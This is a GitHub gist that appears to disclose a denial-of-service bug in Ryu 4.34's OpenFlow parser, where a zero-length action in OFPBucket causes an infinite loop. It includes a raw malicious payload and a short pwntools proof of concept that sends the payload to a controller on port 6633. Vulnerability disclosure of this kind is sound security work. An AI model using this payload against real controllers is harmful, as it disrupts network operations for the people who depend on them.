Skip to content

Instantly share code, notes, and snippets.

@ErodedElk
Created April 9, 2024 17:19
Show Gist options
  • Save ErodedElk/b80493129d67403245ad5618d8c5f3f7 to your computer and use it in GitHub Desktop.
Save ErodedElk/b80493129d67403245ad5618d8c5f3f7 to your computer and use it in GitHub Desktop.
An issue was discovered in OFPBucket in parser.py in Faucet SDN Ryu version 4.34, allows remote attackers to cause a denial of service (DoS) (infinite loop).

in /ryu/ofproto/ofproto_v1_3_parser.py about line=3607

class OFPBucket(StringifyMixin):
    @classmethod
    def parser(cls, buf, offset):
        (len_, weight, watch_port, watch_group) = struct.unpack_from(
            ofproto.OFP_BUCKET_PACK_STR, buf, offset)
        ....
        while length < msg.len:
            action = OFPAction.parser(buf, offset)
            msg.actions.append(action)
            offset += action.len
            length += action.len

If action.len=0,the offset and length will no longer change and the parsing will fall into an infinite loop.

payload:

payload="\x04\x13\x00\x38\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x0000\x28\x00\x00\x00\x00\x00\x00\x00\x20\x00\x01\xff\xff\xff\xffff\xff\xff\xff\x00\x00\x00\x00\x00\x19\x00\x00\x80\x00\x08\x0600\x00\x00\x00\x00\x00\x00\x00"

poc:

from pwn import *
p=remote("0.0.0.0",6633)
payload="\x04\x13\x00\x38\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x0000\x28\x00\x00\x00\x00\x00\x00\x00\x20\x00\x01\xff\xff\xff\xffff\xff\xff\xff\x00\x00\x00\x00\x00\x19\x00\x00\x80\x00\x08\x0600\x00\x00\x00\x00\x00\x00\x00"
p.send(payload)
p.interactive()

This POC uses OFPGroupDescStatsReply as an example. The OFPGroupDescStatsReply message will be accompanied by an OFPGroupDescStats structure, and the OFPGroupDescStats will be accompanied by an OFPBucket , in which the length of OFPAction is tampered with to 0.

However, please note that not all OFPActions will be assigned a length according to the length variable of the message when they are parsed. In this example, OFPActionSetField is used for demonstration.

This problem also occurs with the following code:

/ryu/ofproto/ofproto_v1_3_parser.py about line=3607
/ryu/ofproto/ofproto_v1_4_parser.py about line=5416
/ryu/ofproto/ofproto_v1_5_parser.py about line=6495
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment